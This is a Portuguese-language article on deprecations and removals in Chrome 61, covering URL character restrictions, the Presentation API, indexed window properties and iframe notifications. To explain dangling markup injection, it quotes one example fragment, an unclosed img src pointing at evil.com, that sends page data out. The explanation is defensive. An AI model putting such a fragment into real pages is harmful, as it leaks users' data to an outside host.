Em quase todas as versões do Chrome, observamos um número significativo de atualizações e melhorias no produto, no desempenho e nos recursos da plataforma da Web. Este artigo descreve as suspensões de uso e remoções no Chrome 61, que está na versão Beta desde 3 de agosto. Essa lista está sujeita a mudanças a qualquer momento.
Segurança e privacidade
Bloquear recursos com URLs que contêm os caracteres '\n' e '<'
Há um tipo de invasão de hackers chamado injeção de marcação pendente, em que um
URL truncado é usado para enviar dados a um endpoint externo. Por exemplo,
considere uma página que contém <img src='https://evil.com/?. Como o URL não tem
aspas fechadas, os navegadores vão ler até a próxima aspa que ocorrer e tratar os
caracteres contidos como se fossem um único URL.
O Chrome 61 mitiga essa vulnerabilidade restringindo os conjuntos de caracteres
permitidos nos atributos href e src. Especificamente, o Chrome vai parar
de processar URLs quando encontrar caracteres de nova linha (\n) e caracteres
menores que (<).
Os desenvolvedores que têm um caso de uso legítimo para nova linha e menos de caracteres em um URL precisam fazer o escape desses caracteres.
Intent to remove | Chromestatus Tracker | Chromium Bug
Descontinuar e remover a API Presentation em contextos não seguros
Foi descoberto que, em origens não seguras, a API Presentation pode ser usada como um vetor de invasão. Como as telas não têm barras de endereço, a API pode ser usada para falsificar conteúdo. Também é possível extrair dados de apresentação em execução.
De acordo com a intenção do Blink de remover recursos poderosos em origens não seguras, planejamos descontinuar e
remover o suporte para a API Presentation em contextos não seguros. A partir do Chrome
61, o PresentationRequest.start() não vai mais funcionar em origens não seguras.
Intent to remove | Chromestatus Tracker | Chromium Bug
JavaScript
Não permitir a definição de propriedades indexadas em janelas
Antes, alguns navegadores permitiam atribuições de JavaScript como esta:
window[0] = 1;
As especificações atuais do HTML informam que essa é uma violação explícita da especificação do JavaScript. Por isso, essa capacidade foi removida no Chrome 61. Desde fevereiro de 2016, o Firefox já está em conformidade.
Remoção do uso de notificações de iframes não seguros
As solicitações de permissão de iframes podem confundir os usuários, já que é difícil distinguir a origem da página que contém e a origem do iframe que está fazendo a solicitação. Quando o escopo das solicitações não está claro, é difícil para os usuários julgarem se devem conceder ou negar a permissão.
A proibição de notificações em iframes também vai alinhar os requisitos de permissão de notificação com os de notificações push, facilitando a vida dos desenvolvedores.
Os desenvolvedores que precisam dessa funcionalidade podem abrir uma nova janela para solicitar a permissão de notificação.